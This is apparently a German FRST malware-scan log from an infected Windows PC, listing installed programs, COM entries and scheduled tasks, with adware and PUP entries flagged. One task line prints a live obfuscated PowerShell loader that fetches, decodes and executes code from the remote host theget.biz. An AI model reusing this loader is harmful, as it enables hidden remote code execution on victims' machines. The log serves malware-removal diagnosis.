Update für Microsoft Office Excel 2007 Help (KB963678) (HKLM-x32\...\{90120000-0016-0407-0000-0000000FF1CE}_OMUI.de-de_{BEC163EC-7A83-48A1-BFB6-3BF47CC2F8CF}) (Version: - Microsoft)
Update für Microsoft Office Outlook 2007 Help (KB963677) (HKLM-x32\...\{90120000-001A-0407-0000-0000000FF1CE}_OMUI.de-de_{F6828576-6F79-470D-AB50-69D1BBADBD30}) (Version: - Microsoft)
Update für Microsoft Office Powerpoint 2007 Help (KB963669) (HKLM-x32\...\{90120000-0018-0407-0000-0000000FF1CE}_OMUI.de-de_{EA160DA3-E9B5-4D03-A518-21D306665B96}) (Version: - Microsoft)
Update für Microsoft Office Word 2007 Help (KB963665) (HKLM-x32\...\{90120000-001B-0407-0000-0000000FF1CE}_OMUI.de-de_{38472199-D7B6-4833-A949-10E4EE6365A1}) (Version: - Microsoft)
Welcome Center (HKLM-x32\...\eMachines Welcome Center) (Version: 1.00.3008 - Acer Incorporated)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite_Wave3) (Version: 14.0.8089.0726 - Microsoft Corporation)
Windows Live ID Sign-in Assistant (HKLM\...\{9B48B0AC-C813-4174-9042-476A887592C7}) (Version: 6.500.3165.0 - Microsoft Corporation)
Windows Live Sync (HKLM-x32\...\{76618402-179D-4699-A66B-D351C59436BC}) (Version: 14.0.8089.726 - Microsoft Corporation)
Windows Live-Uploadtool (HKLM-x32\...\{205C6BDD-7B73-42DE-8505-9A093F35A238}) (Version: 14.0.8014.1029 - Microsoft Corporation)
WinZipper (HKLM-x32\...\WinZipper) (Version: 1.5.129 - Taiwan Shui Mu Chih Ching Technology Limited.) <==== ACHTUNG
Zip Extractor Packages (HKU\S-1-5-21-2436113304-3946048090-3963370519-1000\...\Zip Extractor Packages) (Version: - ) <==== ACHTUNG
==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==========================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
CustomCLSID: HKU\S-1-5-21-2436113304-3946048090-3963370519-1000_Classes\CLSID\{005A3A96-BAC4-4B0A-94EA-C0CE100EA736}\localserver32 -> C:\Users\aal\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2436113304-3946048090-3963370519-1000_Classes\CLSID\{ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C}\InprocServer32 -> C:\Users\aal\AppData\Roaming\Dropbox\bin\DropboxExt64.28.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2436113304-3946048090-3963370519-1000_Classes\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\aal\AppData\Roaming\Dropbox\bin\DropboxExt64.28.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2436113304-3946048090-3963370519-1000_Classes\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\aal\AppData\Roaming\Dropbox\bin\DropboxExt64.28.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2436113304-3946048090-3963370519-1000_Classes\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\aal\AppData\Roaming\Dropbox\bin\DropboxExt64.28.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2436113304-3946048090-3963370519-1000_Classes\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\aal\AppData\Roaming\Dropbox\bin\DropboxExt64.28.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2436113304-3946048090-3963370519-1000_Classes\CLSID\{FB314EDD-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\aal\AppData\Roaming\Dropbox\bin\DropboxExt64.28.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2436113304-3946048090-3963370519-1000_Classes\CLSID\{FB314EDE-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\aal\AppData\Roaming\Dropbox\bin\DropboxExt64.28.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2436113304-3946048090-3963370519-1000_Classes\CLSID\{FB314EDF-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\aal\AppData\Roaming\Dropbox\bin\DropboxExt64.28.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2436113304-3946048090-3963370519-1000_Classes\CLSID\{FB314EE0-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\aal\AppData\Roaming\Dropbox\bin\DropboxExt64.28.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-2436113304-3946048090-3963370519-1000_Classes\CLSID\{FBC9D74C-AF55-4309-9FB2-C426E071637F}\InprocServer32 -> C:\Users\aal\AppData\Roaming\Dropbox\bin\DropboxExt64.28.dll (Dropbox, Inc.)
==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) =============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
Task: {01F18B01-C6A2-4A6B-8C05-2E0BC4F9DE6D} - System32\Tasks\{D2CB293C-F818-4C11-8363-BD3EBEFB61B0} => C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
Task: {1744D1CA-E769-470F-92BB-F66829572A9C} - System32\Tasks\{CC0E1A70-C275-49A4-8056-A81A41A44A4D} => pcalua.exe -a D:\SF_CDA_Full_Non-Network_deu.exe -d D:\
Task: {1A9649B4-40EE-4303-9B6D-B0C359FD25D1} - System32\Tasks\ShadowOptimizer => c:\programdata\{272179fc-eb1c-29ec-2721-179fceb1e7f3}\4436006177664429834c.exe <==== ACHTUNG
Task: {1D1DBCB9-378A-4BAF-9D68-3D2655D06500} - \crxbroBrowserUpdateCore -> Keine Datei <==== ACHTUNG
Task: {24AF068E-5E0B-4655-9205-9CA487A2DBF8} - \Superclean -> Keine Datei <==== ACHTUNG
Task: {30D32A27-0009-4096-8DCE-39C6CEF9EF2A} - System32\Tasks\AVAST Software\Avast settings backup => C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe [2015-12-29] (AVAST Software)
Task: {311EFBD3-C6EC-4CDF-AF4C-44D262A85E5B} - \SystemHealer Run Delay -> Keine Datei <==== ACHTUNG
Task: {3B68DA25-C759-44F7-A03B-D772284A140D} - System32\Tasks\Norton 360\Norton Error Analyzer => C:\Program Files (x86)\Norton 360\Engine\6.4.0.9\SymErr.exe
Task: {3CFA76CE-3904-4FD1-AC4A-3DEC1FE880E8} - \Plus-HD-2.3-chromeinstaller -> Keine Datei <==== ACHTUNG
Task: {4686FCE7-5B52-41D3-897F-0BA511FA2BBC} - System32\Tasks\Norton 360\Norton Error Processor => C:\Program Files (x86)\Norton 360\Engine\6.4.0.9\SymErr.exe
Task: {52097F27-8196-4155-B754-E6503FC34D6B} - System32\Tasks\TrackGraph => c:\programdata\{fdc89853-e970-51f1-fdc8-89853e97614f}\7067044988081247635c.exe <==== ACHTUNG
Task: {54390B26-D6FC-421D-ABFF-DA58462DC9FE} - \System HealerStartUp -> Keine Datei <==== ACHTUNG
Task: {5A40E926-9E86-4B89-9CFD-B12311724371} - System32\Tasks\Microsoft\Windows\UPnP\UPnPHostConfig => config upnphost start= auto
Task: {5BBBD812-BDB0-4224-974E-65B567104DAA} - \System HealerPeriod -> Keine Datei <==== ACHTUNG
Task: {62738D39-B041-427A-B963-CAC7A49BC4CE} - System32\Tasks\Norton WSC Integration => C:\Program Files (x86)\Norton 360\Engine\6.4.0.9\WSCStub.exe
Task: {69A81738-C78A-49D9-850D-EA59512EE1B1} - System32\Tasks\Camera Component => Rundll32.exe "C:\Users\aal\AppData\Local\Camera Component\Bin\CameraComponent.dll",#3 <==== ACHTUNG
Task: {6C0446E8-38EE-42D0-93C0-F9D49A1196B0} - System32\Tasks\{0ED8671B-8223-48BF-BCDD-C4B535458A3E} => pcalua.exe -a C:\Users\aal\Desktop\AutoCAD2006\Setup.exe -d C:\Users\aal\Desktop\AutoCAD2006
Task: {6D904F49-5DAE-4184-A1B5-547A70845E2D} - \Plus-HD-2.3-codedownloader -> Keine Datei <==== ACHTUNG
Task: {6DABD2F9-AB83-4282-94EA-B730BDC01A8D} - System32\Tasks\DigiStage => c:\programdata\{05c89a73-f02d-4d6e-05c8-89a73f0269cf}\4111124357625733680c.exe <==== ACHTUNG
Task: {6F8EBD76-7283-4967-A19B-3845151A2DB3} - System32\Tasks\{12AEDD6C-D8B3-9FA2-F2CA-DCD568508709} => powershell.exe -windowstyle hidden -noninteractive -ExecutionPolicy bypass -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFYAZQByAGIAbwBzAGUAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsAJABEAGUAYgB1AGcAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsACgBmAHUAbgBjAHQAaQBvAG4AIABzAHIAKAAkAHAAKQB7ACQAbgA9ACIAVwBpAG4AZABvAHcAUABvAHMAaQB0AGkAbwBuACIAOwB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAcAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0AYwBhAHQAYwBoAHsAfQB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAE8AUgBEACAALQBWAGEAbAB1AGUAIAAyADAAMQAzADIAOQA2ADYANAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0ACgBjAGEAdABjAGgAewB0AHIAeQB7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFYAYQBsAHUAZQAgADIAMAAxADMAMgA5ADYANgA0AHwATwB1AHQALQBOAHUAbABsADsAfQBjAGEAdABjAGgAewB9AH0AfQBzAHIAKAAiAEgASwBDAFUAOgBcAEMAbwBuAHMAbwBsAGUAXAAlAFMAeQBzAHQAZQBtAFIAbwBvAHQAJQBfAFMAeQBzAHQAZQBtADMAMgBfAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABfAHYAMQAuADAAXwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAJQBTAHkAcwB0AGUAbQBSAG8AbwB0ACUAXwBTAHkAcwB0AGUAbQAzADIAXwBzAHYAYwBoAG8AcwB0AC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAdABhAHMAawBlAG4AZwAuAGUAeABlACIAKQA7AAoAJABzAHUAcgBsAD0AIgBoAHQAdABwADoALwAvAHQAaABlAGcAZQB0AC4AYgBpAHoALwB1AC8APwBxAD0AUwBDAHoAWABmAHIAagBOAHkAMQB2AGwANgBoAGgAbABVAEUASQBwAF8AXwA1AG8AYgA4AG8ASwBpAGwAcQA0AE0ASABDAHEATABUAEwAcwB2AGgAOQBxAFoAVQBIAEEAMABsAGMAdABCADkARwBTAHEARQB5AEMASgBsAHAAawB2ADYAOAA3AGYAUgB6AC0AWABoAHMAZgB1AFUASwBhAG0AYgBNAEwATgBsAEoAaQBSADAASwBTAHkAaABoAHMAbwBCADkASQB6AHgARQB5ADQAVgBGAEsANgAzAEwAbQBxADQAVgBfADgAbgA5AEkASABJAHYATABZAGwAMwBXAHUAagAwAGoAYQBRAEkAUAAwAFoAOQBIAHIATQBBAGIASgAwAGIARwBTADYAOABSAFIAVQBBAG4AbwB2AEIAUgB2AG0AYQAxAHkATAB5AHYAVwBKAEkAaABHADYAZwBxAHEATgAzADcAYwAwAGsATQA0AEEAcwBSAHoAZABKAFkAeABhAE8AdwBfAFAARwBGAHMAVwBxADUAVwBuAGYAQwAwADEASwBXAHoATgBoAE8AVgBuAE4ASgBCADAAbABMAHcAcwA0AFoAbABPAGcAZABpAC0AUgBIAG4AZAAyAHgANgB3AHMANABZAHoAMAAtAGgAXwBLAEIAMwAxADIAbQBZADMANwA4AGQAVwBpAGYAdgBIAC0AUgBaAHMAeQB0AEUARAA0AHUAdAB0AFAAUwBXAEkAaQBZAGwAdQBMAFYAOABLAG0AMwBzAG0AVwBnADYAcQBoAG4ANgBXAEUARgA1AGUAcgBDAEcAegBzAHkARQBhAEsAVAA4AFEAVwBLAEIAVgBGAGEARQB6AEwAOABGAFcAYQBPAGsATgA1AEkAVQBYAHYAQwBIAFoASgBMAG4AVgBrADkAcQBTAGgAcABUAEwASAA1AFQAVwBHAGEAcAAxAEgAbwBtADIAQwBQAHMAeAB5AEgAagBKAHUAdwBXAC0AeABUAEEAVgBKAGQAbQBOAEYATgB2AGoAdwA3AGwATQBrAEkAMgA5AHoAOQBqAHcARwBFAGwAMgBDAHAAVgB5AHQASwByAGsAcwB6AEQASQBpAHIAQgBqADcANQBmADQAaQBBAHMAQQB6AFEAdQBlAG0AeAB3AHYASABvAHAAUgB1ADMASABaAEUAMwB6AGMAdgBBAFkAawA2AFMAdAB6ACYAYwA9AFkATwB5AEcAVAA4AGgAOAAwAFgAdABHADYAMQBXAFEAVQB2AGMATwA5AGEAeABfAFMANgBBADMASwB3AHcAdABjAEYAUgBwADIARgBKAHkAbwA1ADkAdwBTAC0AbwBoAEYAWQBGAGMAQQB6AC0AeABRAEYAZABPAEUAVwByAEMAVwBQAHIAcABBAEUARABmADIAegBaADAAQwBpAHIAegBUAHUAQQBIADMAcgBfAHgAUgBoAGUAXwBTADMAdwBVAEwAQQBFAEIAMwBoAEYANQBuADMAQQBYAFUAYgBnAEsAYgBDAE8AVwB1AFkAawBTAHUAZwBIAFgAegBCAGQAMQBBAHgAeABNAE4ASAAyAFYAdgBoAFEATwBLAGQAMQBSAGYAdQA0AFQAWABQAHYAWAB5AEgAdQBmAC0AdwBNAGoAUAA5AGoAbgBLAGMAUQBnAFYANAA5ADkAbQAtAEQARgBfADAAQgA3AHoAZABQADIAMQBCADkAOQBSAFEANAAyADQALQA5AHUARABIAHoAdQBIAHMAZwB3AEIAVwBBAGwAOAB5AHkAdgA3AEcAcgBQAHgAMQBTAGoANgBBAEoANwB5AEIAeQBPAE8AQgAtAGQASwBwAHcAVwAyADEAMgBXAHMAVgBqAFAASgBwAE4AUwB0AFkAQgBSAEYATQA4AHoASAA0AEwAZABRAEIAOAAyAF8ATAB0AGgAaQBpAFoAUQBaAC0AdAByAFMASQBfAEkAcQBvAHcAbwAyAGUAZABfAGMAMwBxAHkAZQBEAGsALQBRAEIAYgB3AFEALQBKAEsAVwBpAEsANwA0AHYAcgB1AGEATQBnAGIAcgBKAEEAaAA5AE8AVgBuAFoAdgBQADYAMQAyAC0AcQBRAEIAawBuAFcAegA5ADAAQgBPAEQATgBtADAAMABXAGMAcgA0ADgATQBQADQAdQB4AEUAQwBrADQASwBfAF8ARgAtAEsASgBVAEwAawAyAC0AUwBnADUANwBSADYAcQAxAEQAWQA5ADAAcAA1AFEASQA5AFcATgBCAFYALQBnAG4ARwB2AHMAZwBvAEYANwBsAGcAaQBCAHUAWABxAFQARgBzADQAVwA2ADQAWAB0ADAAWAB6AEgAcwBvAGkAdAB6AF8AMABjAFYAVABrAFYARQBpADUAWgBlAGEAeABrAHAATAB1AHgARgBwAEMAQQBiAFgATgBJAHoAaABJAHMARABhAHAAcQB6AEIAaQBRADIAMwBiADUAeQBiAHMAcgA4AFAAUwBkAEUAUwA2AFIAdwBHAEoAeQBDAFUAUAByAGIAZABfAEcARABYAFIANAB1AEQAUQBWAGYAdQBlAFcAWAA0AE0ATwAzAFcAYgBGAHgAMQBqAGMANQBhADYAbgBUADkANgB2ADAAVQBiAGsAWgB5AEgAZABNAFUATQA0AEcAUgBOAGUAawA1ADYAeABrAEwAMgBlAEkASABIAEIAYgBzAHIAOABRADgALQBrAGQAcgBDAHIAOABQAGoAVwAtAGUAegBhAEQAeQB1AGkAXwBFAGYASQAtAEsATQA1AFoAcQBGAFkAdABNAGsAUQB2ADcAZAA2AFQAbwBrAHEAYwB2AGEASwBrAHAASQB3AEkARwBXAGgAbABuAF8ANABkADYAeQBFADEAdwBIAF8ARwAyAEgAUABzAHgAcQBvAEIANQB3AE4AcABwAEkAaQBHAHQAcQBhADgAMQBJAE4AVgBfAGMATwBqAFQAbwAzAE8ARQBTADUASgA5ADAAdwB3AGEAeAA3ADkAYwAmAHIAPQA1ADIAMAA5ADcAOAA5ADcANAA3ADAAOQA0ADQANwA5ADQAOQAyACIAOwAkAHMAdABzAGsAPQAiAHsAMQAyAEEARQBEAEQANgBDAC0ARAA4AEIAMwAtADkARgBBADIALQBGADIAQwBBAC0ARABDAEQANQA2ADgANQAwADgANwAwADkAfQAiADsAJABwAHIAaQBkAD0AIgBEAFQAIgA7ACQAaQBuAGkAZAA9ACIAMAAiADsAdAByAHkAewBpAGYAKAAkAFAAUwBWAGUAcgBzAGkAbwBuAFQAYQBiAGwAZQAuAFAAUwBWAGUAcgBzAGkAbwBuAC4ATQBhAGoAbwByACAALQBsAHQAIAAyACkAewBiAHIAZQBhAGsAOwB9ACQAdgA9AFsAUwB5AHMAdABlAG0ALgBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoATwBTAFYAZQByAHMAaQBvAG4ALgBWAGUAcgBzAGkAbwBuADsACgBpAGYAKAAkAHYALgBNAGEAagBvAHIAIAAtAGUAcQAgADUAKQB7AGkAZgAoACgAJAB2AC4ATQBpAG4AbwByACAALQBsAHQAIAAyACkAIAAtAEEATgBEACAAKAAoAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AUwBlAHIAdgBpAGMAZQBQAGEAYwBrAE0AYQBqAG8AcgBWAGUAcgBzAGkAbwBuACAALQBsAHQAIAAyACkAKQB7AGIAcgBlAGEAawA7AH0AfQAKAGkAZgAoAC0ATgBPAFQAIAAoAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAFAAcgBpAG4AYwBpAHAAYQBsAF0AWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMASQBkAGUAbgB0AGkAdAB5AF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAKAApACkALgBJAHMASQBuAFIAbwBsAGUAKABbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBCAHUAaQBsAHQASQBuAFIAbwBsAGUAXQAgACIAQQBkAG0AaQBuAGkAcwB0AHIAYQB0AG8AcgAiACkAKQB7AGIAcgBlAGEAawA7AH0ACgBmAHUAbgBjAHQAaQBvAG4AIAB3AGMAKAAkAHUAcgBsACkAewAkAHIAcQA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAHIAcQAuAFUAcwBlAEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzAD0AJAB0AHIAdQBlADsAJAByAHEALgBIAGUAYQBkAGUAcgBzAC4AQQBkAGQAKAAiAHUAcwBlAHIALQBhAGcAZQBuAHQAIgAsACIATQBvAHoAaQBsAGwAYQAvADQALgAwACAAKABjAG8AbQBwAGEAdABpAGIAbABlADsAIABNAFMASQBFACAANwAuADAAOwAgAFcAaQBuAGQAbwB3AHMAIABOAFQAIAA2AC4AMQA7ACkAIgApADsAcgBlAHQAdQByAG4AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAcgBxAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAHUAcgBsACkAKQA7AH0ACgBmAHUAbgBjAHQAaQBvAG4AIABkAHMAdAByACgAJAByAGEAdwBkAGEAdABhACkAewAkAGIAdAA9AFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJAByAGEAdwBkAGEAdABhACkAOwAkAGUAeAB0AD0AJABiAHQAWwAwAF0AOwAkAGsAZQB5AD0AJABiAHQAWwAxAF0AIAAtAGIAeABvAHIAIAAxADcAMAA7AGYAbwByACgAJABpAD0AMgA7ACQAaQAgAC0AbAB0ACAAJABiAHQALgBMAGUAbgBnAHQAaAA7ACQAaQArACsAKQB7ACQAYgB0AFsAJABpAF0APQAoACQAYgB0AFsAJABpAF0AIAAtAGIAeABvAHIAIAAoACgAJABrAGUAeQAgACsAIAAkAGkAKQAgAC0AYgBhAG4AZAAgADIANQA1ACkAKQA7AH0ACgByAGUAdAB1AHIAbgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBEAGUAZgBsAGEAdABlAFMAdAByAGUAYQBtACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAkAGIAdAAsADIALAAoACQAYgB0AC4ATABlAG4AZwB0AGgALQAkAGUAeAB0ACkAKQApACwAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApADsAfQAKACQAcwBjAD0AZABzAHQAcgAoAHcAYwAoACQAcwB1AHIAbAApACkAOwBJAG4AdgBvAGsAZQAtAEUAeABwAHIAZQBzAHMAaQBvAG4AIAAtAGMAbwBtAG0AYQBuAGQAIAAiACQAcwBjACIAOwB9AGMAYQB0AGMAaAB7AH0AOwBlAHgAaQB0ACAAMAA7AA==
Task: {7EC89C56-0A03-45FF-B60E-A02220A694C1} - \Digital Sites -> Keine Datei <==== ACHTUNG
Task: {7F324011-0D41-4E87-BA51-34FC8BF259B4} - System32\Tasks\{156EF284-74AB-4005-A420-545EC264B85A} => C:\Program Files (x86)\Microsoft Office\Office\OUTLOOK.EXE [1996-12-13] (Microsoft Corporation)
Task: {84F453EA-B109-470B-8C24-A905F8720084} - System32\Tasks\cmdLogs => c:\programdata\{c9dff653-ed8e-aa53-c9df-ff653ed8d94f}\8758023524851211069e.exe <==== ACHTUNG
Task: {8D6A0E51-A9CD-4F07-B6D7-036A0FE4C6C2} - \DNSIKATAN -> Keine Datei <==== ACHTUNG
Task: {9255F7DC-7787-420C-A4C9-52EA16C826F4} - \System Healer Task -> Keine Datei <==== ACHTUNG
Task: {9278F728-7C9D-4C3D-AC81-63848A643F6E} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2015-10-28] (Adobe Systems Incorporated)
Task: {970BC942-649D-48FB-A25D-F5A05C6563C6} - \Plus-HD-2.3-enabler -> Keine Datei <==== ACHTUNG
Task: {97FDB919-7AAD-4BA3-9573-0C76A94C2796} - System32\Tasks\Games\UpdateCheck_S-1-5-21-2436113304-3946048090-3963370519-1000
Task: {9A6EA4F0-680A-4ACD-A9E8-B0F3FE2E8CAC} - \SystemHealer Monitor -> Keine Datei <==== ACHTUNG
Task: {9DFAF495-1E45-4490-B4CC-BBEEC7135B2C} - System32\Tasks\{646F476B-DBA7-4A16-BD2D-D9D08D3D0C73} => pcalua.exe -a C:\Users\aal\AppData\Roaming\mystartsearch\UninstallManager.exe -c -ptid=cvs
Task: {9F9B7B2C-F4C8-4B7D-8DC3-10229A4EDBC2} - System32\Tasks\{EEC27E1B-CFFB-4160-A114-4FA428B12150} => pcalua.exe -a "C:\Users\aal\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\3VQRN2XP\e_mail_software_setup.exe" -d C:\Users\aal\Desktop
Task: {A2E03C74-9D0A-401D-BB88-5EDBED215F50} - System32\Tasks\avast! Emergency Update => C:\Program Files\AVAST Software\Avast\AvastEmUpdate.exe [2015-12-29] (AVAST Software)
Task: {A35BEAF3-35F4-444F-8144-71D3A862DD7B} - \crxbroBrowserUpdateUA -> Keine Datei <==== ACHTUNG
Task: {B2A947E5-533B-47BD-8364-41925B95CE63} - \Run_Bobby_Browser -> Keine Datei <==== ACHTUNG
Task: {B484E492-445C-4056-8D69-C57310EEAE75} - System32\Tasks\{9FFBB573-91C4-45B8-9B59-D6377A5F8866} => pcalua.exe -a D:\SETUP.EXE -d D:\
Task: {B4B668B3-D4F3-43AB-A63D-3ABC4EAE3E8A} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2007-08-29] (Apple Inc.)
Task: {B7DF923C-CFEB-4FCF-9FD8-657150DC993E} - System32\Tasks\DropboxUpdateTaskUserS-1-5-21-2436113304-3946048090-3963370519-1000Core => C:\Users\aal\AppData\Local\Dropbox\Update\DropboxUpdate.exe [2015-06-02] (Dropbox, Inc.)
Task: {B996EA33-CB03-4692-B662-7B847037FFFF} - System32\Tasks\DropboxUpdateTaskUserS-1-5-21-2436113304-3946048090-3963370519-1000UA => C:\Users\aal\AppData\Local\Dropbox\Update\DropboxUpdate.exe [2015-06-02] (Dropbox, Inc.)
Task: {BBBA5C63-E177-4723-A073-DA96FA1DC814} - System32\Tasks\{89B6D761-D6FE-402B-89FD-E9068643B40D} => C:\Program Files (x86)\Microsoft Office\Office\OUTLOOK.EXE [1996-12-13] (Microsoft Corporation)
Task: {C496DAEB-11C9-4A50-BFED-A1D53D15870E} - System32\Tasks\{FE4E5214-5279-4426-8907-C7D2F4C203C2} => C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
Task: {D06B52ED-3DE7-4CA4-8E66-F86A5395E155} - System32\Tasks\DataDimes => c:\programdata\{3a173462-b24b-fb24-3a17-73462b24d18a}\8710836550165241625e.exe <==== ACHTUNG
Task: {D0EEF58C-3859-480F-AB32-C91F1CCADEEF} - \Optscan -> Keine Datei <==== ACHTUNG
Task: {D25B2569-1064-415D-A906-BD36DFE70E9B} - System32\Tasks\{092A6ECF-8C54-4F14-8F95-C12E52FC86DF} => pcalua.exe -a C:\Users\aal\AppData\Roaming\mystartsearch\UninstallManager.exe -c -ptid=cvs
Task: {D8AC637E-0170-469C-B60F-1CE347E04301} - System32\Tasks\{BC73F859-CE3E-4237-B6F1-893452F8CD50} => pcalua.exe -a K:\AutoCAD2006\Setup.exe -d K:\AutoCAD2006
Task: {DD9F510C-95F4-499A-90C8-BAC5BC372FF4} - System32\Tasks\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask => start sppsvc
Task: {E1FFC995-3845-40C5-A118-BF452BA480E5} - \DigitalSite -> Keine Datei <==== ACHTUNG
Task: {E89048EF-AD17-4CD9-A6D5-8913069CD5C0} - \crxbroCheckTask -> Keine Datei <==== ACHTUNG
Task: {F2136842-DCA7-486D-8E0B-5335B333DD0B} - System32\Tasks\{DAB94A89-0F76-4D10-9FD1-4F8458E9782C} => C:\Program Files (x86)\Microsoft Office\Office\OUTLOOK.EXE [1996-12-13] (Microsoft Corporation)
Task: {F8CAECB1-81A2-46B5-9263-C964ED76A191} - \Plus-HD-2.3-updater -> Keine Datei <==== ACHTUNG
Task: {FE248941-AA55-4CAB-8F18-CCABBE6AF191} - System32\Tasks\{1C5AFDDC-B531-4C42-93EF-9394BD1BD63C} => pcalua.exe -a D:\setup.exe -d D:\
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)
Task: C:\Windows\Tasks\cmdLogs.job => c:\programdata\{c9dff653-ed8e-aa53-c9df-ff653ed8d94f}\8758023524851211069e.exe <==== ACHTUNG
Task: C:\Windows\Tasks\DataDimes.job => c:\programdata\{3a173462-b24b-fb24-3a17-73462b24d18a}\8710836550165241625e.exe <==== ACHTUNG
Task: C:\Windows\Tasks\DigiStage.job => c:\programdata\{05c89a73-f02d-4d6e-05c8-89a73f0269cf}\4111124357625733680c.exe <==== ACHTUNG
Task: C:\Windows\Tasks\DropboxUpdateTaskUserS-1-5-21-2436113304-3946048090-3963370519-1000Core.job => C:\Users\aal\AppData\Local\Dropbox\Update\DropboxUpdate.exe
